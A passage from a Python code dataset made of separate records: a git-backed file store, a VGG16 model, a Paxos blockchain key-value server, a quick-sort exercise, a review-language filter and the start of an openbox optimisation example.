ps=obj.iter_contentpath()\n ps.sort()\n p=ps[0]\n # path=path+'/'+os.path.basename(p)\n copy_fsitem(p, path)\n\n else:\n for p in obj.iter_contentpath():\n copy_fsitem(p, path)\n # obj.rmself()\n # remove_fsitem(cache_dir)\n # shutil.rmtree(cache_dir)\n @classmethod\n def uploadStoreitem(cls,path, remote_location, remote_branch, cache_dir,add_more=None):\n assert os.path.exists(path)\n if os.path.isdir(path):\n tmp = StoreFolder(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n if os.path.isfile(path):\n tmp.eat(path)\n else:\n if add_more:\n for k,v in add_more.items():\n tmp.addmore(k,v)\n for p in os.listdir(path):\n p = path + '/' + p\n tmp.eat(p)\n tmp.upload(remote_location=remote_location, remote_branch=remote_branch)\n @staticmethod\n def is_legal_path_to_upload(path):\n path=os.path.basename(path)\n legal_path_chars=StoreItem.legal_path_chars\n # print(legal_path_chars)\n if StoreItem.delimiter in path:\n import logging\n logging.warning('Illegal path \"%s\"!' 
% (path))\n return False\n for ch in path:\n if ch not in legal_path_chars:\n import logging\n logging.warning('Illegal path \"%s\"!'%(path))\n return False\n return True\n\n @classmethod\n def uploadStoreitemRecursive(cls,path, remote_location=None, remote_branch=None,\n cache_dir='.store.upload.cache',depth=-1,check_path=True):\n # todo: check branch name\n # assert remote_branch not in cls.special_branches\n assert depth>=0 or depth==-1\n assert os.path.exists(path)\n if check_path:\n assert cls.is_legal_path_to_upload(path)\n remote_location=remote_location or default_remote_location\n assert remote_branch\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n target_dir=cache_dir+'/target'\n store_dir=cache_dir+'/stores'\n os.makedirs(target_dir)\n copy_fsitem(path,target_dir)\n path=target_dir+'/'+os.path.basename(path)\n return cls._uploadStoreitemRecursive(path, remote_location, remote_branch, cache_dir=store_dir,depth=depth,check_path=check_path)\n @classmethod\n def _uploadStoreitemRecursive(cls,path, remote_location, remote_branch, cache_dir,depth=0,check_path=True):\n assert os.path.exists(path)\n if check_path:\n assert cls.is_legal_path_to_upload(path)\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n os.makedirs(cache_dir)\n print('path:',path)\n if depth==0:\n if os.path.isdir(path):\n\n tmp = StoreFolder(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n for p in os.listdir(path):\n p = path + '/' + p\n tmp.eat(p)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n tmp.eat(path)\n else:\n import uuid\n if os.path.isdir(path):\n self_cache_dir = cache_dir+'/self-cache-' + uuid.uuid4().hex\n more={}\n for name in os.listdir(path):\n p=path+\"/\"+name\n if check_path:\n assert cls.is_legal_path_to_upload(p)\n item_cache_dir=cache_dir+'/item-cache-'+name\n os.mkdir(item_cache_dir)\n item_branch=remote_branch+cls.delimiter+name\n cls._uploadStoreitemRecursive(path=p,remote_location=remote_location,remote_branch=item_branch,cache_dir=item_cache_dir,depth=depth-1)\n more[name]=item_branch\n os.mkdir(self_cache_dir)\n tmp = StoreFolder(self_cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.morefile.update(more)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n tmp.eat(path)\n tmp.upload(remote_location=remote_location, remote_branch=remote_branch)\n remove_fsitem(path)\n def is_empty(self):\n names=self.listdir()\n for name in names:\n if name not in self.data_list:\n return False\n return True\n def clean(self):\n names=self.listdir()\n for name in names:\n if name in self.data_list:\n continue\n self.remove(name)\n if name=='.more.store':\n self.openFiledict(name)\n\nclass StoreFolder(StoreItem):\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.morefile = self.openFiledict('.more.store')\n self.set_type(T.FOLDER)\n def addmore(self,name,branch):\n self.morefile[name]=branch\n def eatStore(self,path,name=None,remote_location=None,remote_branch=None,upload=True,overwrite=False,cache_dir='.tmp',in_depth=0):\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n os.makedirs(cache_dir)\n assert os.path.exists(path)\n if not name:\n name=os.path.basename(os.path.abspath(path))\n remote_location = remote_location or self.remote_location\n assert remote_location\n if not remote_branch:\n assert self.remote_branch\n 
remote_branch=self.remote_branch+self.delimiter+name\n if upload:\n StoreItem.uploadStoreitem(path,remote_location=remote_location,remote_branch=remote_branch,cache_dir=cache_dir)\n self.morefile[name]=remote_branch\n\nclass StoreFile(StoreItem):\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.set_type(T.FILE)\n\n\n\nclass RemoteBranchList(StoreFolder):\n def __init__(self,path=None,remote_location=None,remote_branch=None):\n remote_branch=remote_branch or _BRANCH_LIST\n if not path:\n path=get_default_path(remote_location,remote_branch)\n super().__init__(path,remote_location,remote_branch,is_remote_branch_list=True) # create local branch\n self._init_remote_branch_list()\n def _init_remote_branch_list(self):\n repo=self.repo\n try:\n self._pull_remote()\n if self.is_empty() or not self.exists(_BRANCH_LIST):\n self.openSimpleListfile(_BRANCH_LIST)\n self._push_self()\n except:\n import logging\n logging.warning(\"Can't pull from remote, maybe because local branch is already updated , or remote branch doesn't exist.\")\n def sync_list(self):\n self._try_pull_remote()\n def read_list(self):\n return self.list_branches()\n def list_branches(self):\n return self._read_remote_branch_list()\n def branch_add_if_not_exists(self,branch):\n return self.branch_add(branch)\n def branch_add(self,branch):\n lf=self.openSimpleListfile(_BRANCH_LIST)\n lis=lf.read()\n if branch not in lis:\n self._try_pull_remote()\n lis.append(branch)\n lf.write(lis)\n self._push_self()\n def branch_exists(self,branch):\n if branch in self._read_remote_branch_list():\n return True\n else:\n self._try_pull_remote()\n if branch in self._read_remote_branch_list():\n return True\n else:\n return False\n def _read_remote_branch_list(self):\n return self.openSimpleListfile(_BRANCH_LIST).read()\n\n\n\n\n","sub_path":"build/lib/wk/extra/gitspace/StoreItem.py","file_name":"StoreItem.py","file_ext":"py","file_size_in_byte":19616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220490977","text":"#!/home/iflyings/VSCode/venv/tensorflow-venv python\n# -*- coding:utf-8 -*-\n# Author: iflyings\nimport tensorflow as tf\n\nclass VGG16:\n def __init__(self, n_classes, is_train = True):\n self.is_train = is_train\n self.n_classes = n_classes\n\n def __conv_wrapper(self, inputs, filters, activation=tf.nn.relu, name=\"conv\"):\n conv = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[3, 3],\n padding=\"same\",\n activation=activation,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n name=name)\n '''\n bn = tf.layers.batch_normalization(conv,\n momentum=0.9,\n epsilon=1e-5,\n scale=True,\n training=self.is_train,\n name=\"bn_\"+name)\n '''\n return conv\n\n def __pool_wrapper(self, inputs, name=\"pool\"):\n return tf.layers.max_pooling2d(\n inputs=inputs, \n pool_size=[2, 2], \n strides=2,\n name=name)\n\n def __dense_wrapper(self, inputs, units, activation=tf.nn.relu, name=\"dense\"):\n return tf.layers.dense(\n inputs=inputs,\n units=units,\n activation=activation,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003),\n name=name)\n\n def create(self, inputs):\n with tf.compat.v1.variable_scope('layer_1') as scope:\n conv1_1 = self.__conv_wrapper(inputs, filters=64, name=\"conv1_1\")\n conv1_2 = self.__conv_wrapper(conv1_1, filters=64, name=\"conv1_2\")\n pool1 = self.__pool_wrapper(conv1_2, name=\"pool1\")\n with 
tf.compat.v1.variable_scope('layer_2') as scope:\n conv2_1 = self.__conv_wrapper(pool1, filters=128, name=\"conv2_1\")\n conv2_2 = self.__conv_wrapper(conv2_1, filters=128, name=\"conv2_2\")\n pool2 = self.__pool_wrapper(conv2_2, name=\"pool2\")\n with tf.compat.v1.variable_scope('layer_3') as scope:\n conv3_1 = self.__conv_wrapper(pool2, filters=256, name=\"conv3_1\")\n conv3_2 = self.__conv_wrapper(conv3_1, filters=256, name=\"conv3_2\")\n conv3_3 = self.__conv_wrapper(conv3_2, filters=256, name=\"conv3_3\")\n pool3 = self.__pool_wrapper(conv3_3, name=\"pool3\")\n with tf.compat.v1.variable_scope('layer_4') as scope:\n conv4_1 = self.__conv_wrapper(pool3, filters=512, name=\"conv4_1\")\n conv4_2 = self.__conv_wrapper(conv4_1, filters=512, name=\"conv4_2\")\n conv4_3 = self.__conv_wrapper(conv4_2, filters=512, name=\"conv4_3\")\n pool4 = self.__pool_wrapper(conv4_3, name=\"pool4\")\n with tf.compat.v1.variable_scope('layer_5') as scope:\n conv5_1 = self.__conv_wrapper(pool4, filters=512, name=\"conv5_1\")\n conv5_2 = self.__conv_wrapper(conv5_1, filters=512, name=\"conv5_2\")\n conv5_3 = self.__conv_wrapper(conv5_2, filters=512, name=\"conv5_3\")\n pool5 = self.__pool_wrapper(conv5_3, name=\"pool5\")\n\n flatten = tf.layers.flatten(pool5)\n\n with tf.compat.v1.variable_scope('layer_6') as scope:\n fc1 = self.__dense_wrapper(flatten, 4096, name=\"fc1\")\n dropout1 = tf.layers.dropout(fc1,training=self.is_train,name=\"dropout1\")\n with tf.compat.v1.variable_scope('layer_7') as scope:\n fc2 = self.__dense_wrapper(dropout1, 4096, name=\"fc2\")\n dropout2 = tf.layers.dropout(fc2,training=self.is_train,name=\"dropout2\")\n with tf.compat.v1.variable_scope('layer_8') as scope:\n fc3 = self.__dense_wrapper(dropout2, self.n_classes, activation=None, name=\"fc3\")\n return fc3","sub_path":"python/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"575686641","text":"from NetworkStack import CRC, DataSplitter, IpHandler, MacHandler\nfrom NetworkStack import StopWaitARQ as ARQ\n\nclass NetworkStack():\n def __init__(self):\n self.Splitter = DataSplitter.DataSplitter()\n self.IpHandler = IpHandler.IpHandler()\n self.MacHandler = MacHandler.MacHandler()\n self.CRC = CRC.CRC()\n self.ARQ = ARQ.ARQ()\n","sub_path":"JU/Networks Lab/NetworkStack/NetworkStack.py","file_name":"NetworkStack.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430681227","text":"class Player:\n def __init__(self, login, score, penalty):\n self.login = login\n self.score = score\n self.penalty = - penalty\n\n def __str__(self):\n return self.login\n\ndef is_score_or_login_better(score_1, score_2, penalty_1, penalty_2, login_1, login_2):\n #print('COMPARATOR',score_1, score_2, penalty_1, penalty_2, login_1, login_2)\n if (score_1 == score_2 and penalty_1 < penalty_2):\n print(score_1 == score_2 and penalty_1 < penalty_2)\n return True\n print(False)\n return False\n\ndef quick_sort(players,left,right, less):\n\n if left >= right:\n return\n mid = (left+right)//2\n sep = players[mid].score\n #print('pivot', players[mid].score)\n i = left\n j = right\n while True:\n while players[i].score < sep:\n i += 1\n while players[j].score > sep:\n j -= 1\n flag = less(players[i].score,players[j].score,players[i].penalty, players[j].penalty, players[i].login, players[j].login)\n if (i <= j):\n #print(i,j)\n 
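# Editor's note, a hedged walk-through with made-up values: if the pivot score is 5\n            # and the scores at i..j are [7, 5, 3], the inner while loops stop i at 7\n            # (not < pivot) and j at 3 (not > pivot), so the swap below yields [3, 5, 7]\n            # for this pass. Also note that 'flag' is assigned above but never used, so\n            # ties on score are not actually broken by penalty or login in this snippet.\n            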
#print(players[i].login, players[i].score, players[j].login, players[j].score)\n players[i], players[j] = players[j], players[i]\n #print(players[i].login, players[i].score, players[j].login, players[j].score)\n i += 1\n j -= 1\n if (i > j):\n break\n quick_sort(players, left, j, is_score_or_login_better)\n quick_sort(players, i, right, is_score_or_login_better)\n\n\n\ndef input_data(file_name):\n with open(file_name, 'r') as data:\n player_num = int(data.readline().strip())\n #data = data.read().splitlines()\n players = []\n\n for _ in range(player_num):\n login, score , penalty = data.readline().split()\n players.append(Player(login, int(score), int(penalty)))\n #print(players[_].login, players[_].score, players[_].penalty,)\n\n quick_sort(players, 0, player_num - 1, is_score_or_login_better)\n\n for i in reversed(players):\n print(i.login, i.score, i.penalty)\nif __name__ == '__main__':\n input_data('input.txt')\n\n\n\n\n#quick_sort(x, 0, len(x)-1)\n\n#print(x)\n","sub_path":"sptint_13/effective_quick_sort _task.py","file_name":"effective_quick_sort _task.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314849647","text":"from network import sendMessage, failLink, updateActiveLink, fixLink\nfrom paxos import Paxos\nfrom blockchain import Blockchain\nfrom block import Block, createBlock\nimport socket\nimport threading\nimport pickle\nimport json\nimport sys\nimport os\nimport queue\nimport time\n\nq = queue.Queue()\n\nkeyValueStore = {}\nhasDecision = {}\n\nblockchain = Blockchain()\n\n#5 different servers.\nwith open(\"./config.json\") as f:\n PORTS = json.load(f)\n\nSOCKETS = {}\nMY_ID = None\npaxos = None\nproposedBlock = None\nnetwork = None\nqueueTimeouts = {}\nleaderEstimate = None\nblockLock = threading.Lock()\n\ndef saveBlockchain():\n global MY_ID\n try:\n with open(\"blockchain\" + MY_ID + \".pickle\", \"wb\") as f:\n pickle.dump(blockchain, f, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n pass\n\ndef reconnect(OTHER_IDS, CLIENTS):\n#connect to all other servers. Save sockets in SERVER_SOCKETS\n print(\"trying to reconnect to all servers\", flush=True)\n for id in OTHER_IDS:\n otherPort = PORTS[id]\n otherSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n otherSocket.connect((socket.gethostname(), int(otherPort)))\n SOCKETS[id] = otherSocket\n\n for client in CLIENTS:\n clientPort = PORTS[client]\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.connect((socket.gethostname(), int(clientPort)))\n SOCKETS[client] = clientSocket\n\n paxos.sockets = SOCKETS\n \n\ndef connectToAll(OTHER_IDS, CLIENTS):\n#connect to all other servers. 
Save sockets in SERVER_SOCKETS\n print(\"trying to connect to all\", flush=True)\n for id in OTHER_IDS:\n otherPort = PORTS[id]\n otherSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n otherSocket.connect((socket.gethostname(), int(otherPort)))\n SOCKETS[id] = otherSocket\n \n for client in CLIENTS:\n clientPort = PORTS[client]\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.connect((socket.gethostname(), int(clientPort)))\n SOCKETS[client] = clientSocket\n initializePaxos()\n print(\"connected to all!\", flush=True)\n\n\ndef onDecision(msg, isLeader):\n global leaderEstimate\n global q, proposedBlock, blockchain\n global blockLock\n #print(\"onDecision insert to blockchain\", flush=True)\n blockLock.acquire()\n leaderEstimate = msg['fromId']\n currBlock = blockchain.head\n duplicateBlock = False\n\n while currBlock is not None:\n if currBlock == msg['operation']:\n duplicateBlock = True\n currBlock = currBlock.prev\n \n clientResponse = \"Block already exists.\"\n\n hasDecision[msg['timestamp']] = True\n\n if duplicateBlock == False:\n blockchain.insert(msg['operation'])\n clientResponse = applyOperations(msg['operation'])\n print(\"Updated Blockchain.\", flush=True)\n if proposedBlock:\n if isLeader and proposedBlock == msg['operation']:\n proposedBlock = None\n head = q.get()\n sendMessage(MY_ID, head[\"client\"], {\n 'msg':clientResponse,\n 'operation': msg['operation'].operation,\n 'type':'SERVER_RESPONSE',\n 'timestamp' : msg['timestamp'],\n 'fromId': MY_ID\n }, SOCKETS, paxos.activeLinks)\n blockLock.release()\n return blockchain.depth\n\ndef applyOperations(block):\n global keyValueStore\n print(\"Applying \" + block.operation[\"op\"] + \" operation...\")\n if block.operation[\"op\"] == 'put':\n if block.operation[\"value\"][0] == '{':\n if block.operation[\"key\"] in keyValueStore and type(keyValueStore[block.operation[\"key\"]]) is dict:\n keyValueStore[block.operation[\"key\"]][block.operation[\"value\"].split(\"'\")[1]] = block.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[block.operation[\"key\"]] = {}\n keyValueStore[block.operation[\"key\"]][block.operation[\"value\"].split(\"'\")[1]] = block.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[block.operation[\"key\"]] = block.operation[\"value\"]\n return 'ACK'\n if block.operation[\"op\"] == 'get':\n if block.operation[\"key\"] in keyValueStore:\n return 'GET ' + str(keyValueStore[block.operation[\"key\"]])\n else:\n return 'NO_KEY'\n\ndef onAccept(msg):\n block = msg['operation']\n return block.previousHash == blockchain.head.hash and int(block.hash[-1],16) < 4\n\ndef initializePaxos():\n global paxos\n print(\"Initializing Paxos\", flush=True)\n paxos = Paxos(SOCKETS, MY_ID, onDecision, onAccept)\n threading.Thread(target=queueWatcher).start()\n\ndef queueWatcher():\n global proposedBlock\n global blockLock\n while True:\n blockLock.acquire()\n if not q.empty():\n ts = q.queue[0][\"timestamp\"]\n if ts in hasDecision:\n if hasDecision[ts] == True:\n print(\"decision already made for this operation\")\n q.get()\n continue\n if proposedBlock is None and not q.empty(): #we are ready to start another round of paxos\n if queueTimeouts[q.queue[0][\"timestamp\"]] == True:\n q.get()\n continue\n proposedBlock = createBlock(q.queue[0][\"operation\"], blockchain.head)\n if not paxos.isLeader:\n paxos.prepareProposal(proposedBlock, q.queue[0][\"timestamp\"]) #start paxos\n print(\"Created a proposal with a \" + q.queue[0][\"operation\"][\"op\"] + \" operation and 
ballot number of \" + str(paxos.ballotNum), flush=True)\n else:\n paxos.receivePromise(proposalVal=proposedBlock, timestamp=q.queue[0][\"timestamp\"])\n print(\"I'm leader so sending promise with a \" + q.queue[0][\"operation\"][\"op\"] + \" operation and ballot number of \" + str(paxos.ballotNum), flush=True)\n blockLock.release()\n\ndef printQueue():\n print(\"---Current Operations in queue---\", flush=True)\n if q.empty():\n print(\"Queue is empty\", flush=True)\n else: \n for op in q.queue:\n print(\"Operation: \", op[\"operation\"], flush=True)\n print(\"Client: \", op[\"client\"], flush=True)\n print(\"Timestamp: \", op[\"timestamp\"], flush=True)\n print(\" --------- \", flush=True)\n\ndef printBlockchain():\n global blockchain\n print(repr(blockchain), flush=True)\n\ndef printKeyValueStore():\n print(keyValueStore, flush=True)\n \ndef reconstructKeyVal():\n global blockchain\n global keyValueStore\n curBlock = blockchain.head\n while curBlock is not None:\n if curBlock.operation[\"op\"] == 'put':\n if curBlock.operation[\"value\"][0] == '{':\n if curBlock.operation[\"key\"] in keyValueStore and type(keyValueStore[curBlock.operation[\"key\"]]) is dict:\n keyValueStore[curBlock.operation[\"key\"]][curBlock.operation[\"value\"].split(\"'\")[1]] = curBlock.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[curBlock.operation[\"key\"]] = {}\n keyValueStore[curBlock.operation[\"key\"]][curBlock.operation[\"value\"].split(\"'\")[1]] = curBlock.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[curBlock.operation[\"key\"]] = curBlock.operation[\"value\"]\n curBlock = curBlock.prev\n return\n\ndef waitForMyTimeout(timestamp):\n global queueTimeouts\n global hasDecision\n hasDecision[timestamp] = False\n start = int(time.time())\n now = start\n while (now - start < 38):\n now = int(time.time())\n continue\n queueTimeouts[timestamp] = True\n\ndef waitForLeaderTimeout(timestamp, msg):\n global leaderEstimate\n global queueTimeouts\n global hasDecision\n hasDecision[timestamp] = False\n start = int(time.time())\n now = start\n while (now - start < 38):\n now = int(time.time())\n if hasDecision[timestamp] == True:\n return\n\n prevLeaderEstimate = leaderEstimate\n while leaderEstimate == prevLeaderEstimate:\n leaderEstimate = str((int(leaderEstimate)) % 5 + 1)\n\n if hasDecision[timestamp] == False:\n queueTimeouts[msg[\"timestamp\"]] = False\n q.put({\n 'operation' : msg[\"operation\"],\n 'timestamp' : msg[\"timestamp\"],\n 'client' : msg[\"client\"]\n })\n threading.Thread(target=waitForMyTimeout, args=[msg[\"timestamp\"]]).start()\n\ndef listenForMessages(senderSocket, address):\n global blockchain\n global leaderEstimate\n while True:\n try:\n message = senderSocket.recv(8192)\n if message:\n decodedMessage = pickle.loads(message)\n #print(\"decodedMessage type: \" + decodedMessage[\"type\"], flush=True)\n\n if decodedMessage[\"type\"] == 'FAILLINK':\n updateActiveLink(decodedMessage[\"src\"], paxos.activeLinks, False)\n\n if decodedMessage[\"type\"] == 'FIXLINK':\n updateActiveLink(decodedMessage[\"src\"], paxos.activeLinks, True)\n\n if decodedMessage[\"type\"] == 'OPERATION':\n if leaderEstimate == MY_ID:\n print(\"adding operation to queue\", flush=True)\n queueTimeouts[decodedMessage[\"timestamp\"]] = False\n q.put({\n 'operation' : decodedMessage[\"operation\"],\n 'timestamp' : decodedMessage[\"timestamp\"],\n 'client' : decodedMessage[\"client\"]\n })\n threading.Thread(target=waitForMyTimeout, args=[decodedMessage[\"timestamp\"]]).start()\n else:\n 
sendMessage(MY_ID, leaderEstimate, decodedMessage, SOCKETS, paxos.activeLinks)\n threading.Thread(target=waitForLeaderTimeout, args=[decodedMessage[\"timestamp\"], decodedMessage]).start()\n\n if decodedMessage[\"type\"] == 'PREPARE':\n paxos.receivePrepares(decodedMessage)\n if decodedMessage[\"type\"] == 'PROMISE':\n paxos.receivePromise(decodedMessage)\n if decodedMessage[\"type\"] == 'ACCEPT':\n paxos.receiveAccept(decodedMessage)\n if decodedMessage[\"type\"] == 'ACCEPTED':\n paxos.receiveAccepted(decodedMessage)\n if decodedMessage[\"type\"] == 'DECIDE':\n paxos.receiveDecision(decodedMessage)\n\n saveBlockchain() \n #EOFError gets triggered somwhere here when another server is killed.\n except socket.error as e:\n print(f'Socket at {address} forcibly disconnected with {e}.')\n senderSocket.close()\n break\n\n return\n\ndef handleInput(OTHER_IDS, CLIENTS, MY_ID):\n global blockchain\n global SOCKETS\n while True:\n try:\n cliInput = input()\n if cliInput:\n if cliInput.lower() == \"operation\":\n print(\"doing operation\", flush=True)\n \n if cliInput.lower() == \"connect\":\n print(\"connecting...\", flush=True)\n connectToAll(OTHER_IDS, CLIENTS)\n\n if cliInput.lower() == \"reconnect\":\n print(\"reconnecting...\", flush=True)\n reconnect(OTHER_IDS, CLIENTS)\n \n if cliInput.lower() == \"load blockchain\":\n with open(\"blockchain\" + MY_ID + \".pickle\", \"rb\") as f:\n blockchain = pickle.load(f)\n reconstructKeyVal()\n #reapply operation stuff using blockchain\n \n if cliInput.lower().split(' ')[0] == \"faillink\":\n dest = cliInput.lower().split(' ')[1]\n failLink(MY_ID, dest, SOCKETS, paxos.activeLinks)\n \n if cliInput.lower().split(' ')[0] == \"fixlink\":\n dest = cliInput.lower().split(' ')[1]\n fixLink(MY_ID, dest, SOCKETS, paxos.activeLinks)\n \n if cliInput.lower() == \"printqueue\":\n printQueue()\n\n if cliInput.lower() == \"printchain\":\n printBlockchain()\n \n if cliInput.lower() == \"printstore\":\n printKeyValueStore()\n\n if cliInput.lower() == \"failprocess\":\n os._exit(0)\n\n except EOFError:\n print(\"exception\")\n pass\n #do nothing\n return\n\ndef main():\n #python3 server.py my_id\n global leaderEstimate\n global MY_ID \n if len(sys.argv) != 2:\n print(\"wrong number of arguments\", flush=True)\n MY_ID = str(sys.argv[1])\n MY_PORT = PORTS[MY_ID]\n MY_SOCKET = socket.socket()\n MY_SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n MY_SOCKET.bind((socket.gethostname(), int(MY_PORT)))\n MY_SOCKET.listen(32)\n print('Server' + str(MY_ID) + ' started.', flush=True)\n print('Server listening on port ' + str(MY_PORT) + '.', flush=True)\n OTHER_IDS = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n OTHER_IDS.pop(int(MY_ID) - 1)\n leaderEstimate = \"1\"\n\n CLIENTS = [\"C1\", \"C2\", \"C3\"]\n\n threading.Thread(target=handleInput, args=(\n OTHER_IDS, CLIENTS, MY_ID)).start()\n\n while True:\n try:\n senderSocket, address = MY_SOCKET.accept()\n threading.Thread(target=listenForMessages, args=(senderSocket, address)).start()\n except KeyboardInterrupt:\n os._exit(0)\n return\n\nif __name__ == \"__main__\":\n main()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50730212","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 13 Dec 2016\n\n@author: Hazim Hanif\n'''\nimport os\nimport codecs\nimport json\nimport re\nimport OpiClass_globals as ocg\n\nglobal wordList\nglobal indonList\nglobal finalList\nglobal 
english_count\nglobal indon_count\nglobal total_count\nglobal drop_count\nglobal total_apps\n\ntotal_apps=0\nenglish_count=0\nindon_count=0\ntotal_count=0\ndrop_count=0\nfinalList=[]\nrevDir=\"data/reviews/\"\ndictDir=\"data/dict/\"\nfilteredDir=\"data/filtered_reviews/\"\n\ndef saveFilteredReviews(data,file):\n filename = filteredDir+file\n try:\n with codecs.open(filename, 'wb','utf-8') as outfile:\n json.dump(data, outfile, indent=4, sort_keys=True, separators=(',', ':'),ensure_ascii=False)\n except Exception as e:\n print(e)\n\ndef isIndon(wordIndo):\n \n if wordIndo in map(str.lower,[x.strip(\"\\r\\n\\t\") for x in indonList]):\n #print(\"Indo: \"+wordIndo)\n return 1 \n return 0\n\ndef isEnglish(wordEng):\n \n if wordEng in map(str.lower,[x.strip(\"\\r\\n\\t\") for x in wordList]):\n #print(\"English: \"+wordEnglish)\n return 1 \n return 0\n\n \ndef getReviews(data,threadID,appid):\n global english_count\n global indon_count\n global total_count\n global drop_count\n checkcount=0\n i=0\n \n size_data = len(data)\n division=int(size_data/25)\n checkcount+=division\n print(\"Total review:\"+ str(size_data))\n while i < size_data:\n #print(i)\n if i==checkcount and ocg.progress_list[threadID]<85:\n ocg.progress_list[threadID]+=division\n msg='Filtering opinions for %s. Please sit back, relax and have a coffee ☕️' % (appid)\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n checkcount+=division\n \n countEnglish_perRev=0\n countIndon_perRev=0\n words=str(data[i]['revText']).strip(\".,!?:;`~@#$%^&*()-+=*'[]{}|\\\"/<>\")\n words= re.sub(\"\\.\",\" \",words)\n words= re.sub(\"\\,\",\" \",words)\n words= re.sub(\" \",\" \",words)\n words= re.sub(\" \",\" \",words)\n words=words.lower()\n words_split=words.split(sep=\" \")\n\n for word in words_split:\n countEnglish_perRev=countEnglish_perRev+isEnglish(word)\n countIndon_perRev=countIndon_perRev+isIndon(word)\n \n if countEnglish_perRev == len(words_split):\n #print(\"English: \"+words)\n english_count=english_count+1\n drop_count=drop_count+1\n del data[i]\n size_data=size_data-1\n continue\n \n if countIndon_perRev > (len(words_split)/2):\n #print(\"Endon: \"+words)\n indon_count=indon_count+1\n drop_count=drop_count+1\n del data[i]\n size_data=size_data-1\n continue\n \n data[i]['revText']=words\n total_count=total_count+1\n i=i+1\n return(data)\n \ndef openFile(file):\n filename=revDir+file\n with codecs.open(filename,'rb','utf-8') as data_file: \n return(json.load(data_file))\n\ndef loadWordList():\n global wordList\n global indonList\n indonList=[]\n wordList=[]\n \n data=codecs.open(\"data/dict/english.txt\",'rb','utf-8') \n wordList=data.readlines() \n data=codecs.open(\"data/dict/indon.txt\",'rb','utf-8') \n indonList=data.readlines() \n \ndef start(appid,threadID):\n print(\"======Starting Filtering=======\")\n msg='Initiate filtering for %s' % (appid)\n ocg.progress_list[threadID]+=2\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n file=\"%s.json\" % (appid)\n loadWordList()\n data=openFile(file)\n data=getReviews(data,threadID,appid)\n saveFilteredReviews(data,file)\n if ocg.progress_list[threadID]!=85:\n ocg.progress_list[threadID]+=(85-ocg.progress_list[threadID])\n \n msg='Finished filtering for %s' % (appid)\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n print(\"======Finish Filtering=======\")\n 
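\n# Editor's note, a hedged usage sketch rather than part of the original module: start()\n# expects a scraped review file at data/reviews/<appid>.json, the word lists under\n# data/dict/, and the shared socketio/progress state from OpiClass_globals. The app id\n# and thread id below are hypothetical examples only:\n#\n#   start('com.example.app', 0)   # writes data/filtered_reviews/com.example.app.json\n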
","sub_path":"OpiClass_filter.py","file_name":"OpiClass_filter.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499358399","text":"import os\nimport sys\nimport numpy as np\n\nsys.path.insert(0, os.getcwd())\n\nfrom openbox.optimizer.generic_smbo import SMBO\nfrom openbox.utils.config_space import ConfigurationSpace, UniformFloatHyperparameter\n\n\ndef branin_currin(config):\n dic = config.get_dictionary()\n x1 = dic.get('x1')\n x2 = dic.get('x2')\n px1 = 15 * x1 - 5\n px2 = 15 * x2\n res = dict()\n\n f1 = (px2 - 5.1 / (4 * np.pi ** 2) * px1 ** 2 + 5 / np.pi * px1 - 6) ** 2 + 10 * (1 - 1 / (8 * np.pi)) * np.cos(\n px1) + 10\n f2 = (1 - np.exp(-1 / (2 * x2))) * (2300 * x1 ** 3 + 1900 * x1 ** 2 + 2092 * x1 + 60) / (\n 100 * x1 ** 3 + 500 * x1 ** 2 + 4 * x1 + 20)\n res['objs'] = [f1, f2]\n res['constraints'] = []\n return res\n\n\nbc_params = {\n 'float': {\n 'x1': (0, 1, 0.5),\n 'x2': (0, 1, 0.5)\n }\n}\nbc_cs = ConfigurationSpace()\nbc_cs.add_hyperparameters([UniformFloatHyperparameter(e, *bc_params['float'][e]) for e in bc_params['float']])\nbc_max_hv = 